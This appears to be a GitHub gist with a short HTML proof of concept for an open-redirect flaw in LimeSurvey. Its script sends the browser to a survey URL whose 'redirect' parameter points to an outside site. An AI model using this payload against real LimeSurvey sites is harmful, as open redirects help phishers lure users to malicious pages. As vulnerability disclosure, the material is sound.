Skip to content

Instantly share code, notes, and snippets.

@marpie
Created September 4, 2012 17:06
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save marpie/3623557 to your computer and use it in GitHub Desktop.
Save marpie/3623557 to your computer and use it in GitHub Desktop.
[LimeSurvey] Arbitrary URL redirect
<html>
<head><title>poc: Arbitrary URL redirect (move=clearall)</title></head>
<body>
<img src="https://limesurvey/index.php?sid=51928" border=0 onerror="done();">
<script>
function done() {
window.location = "https://limesurvey/index.php?sid=51928&move=clearall&lang=de&redirect=http://www.google.de";
}
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment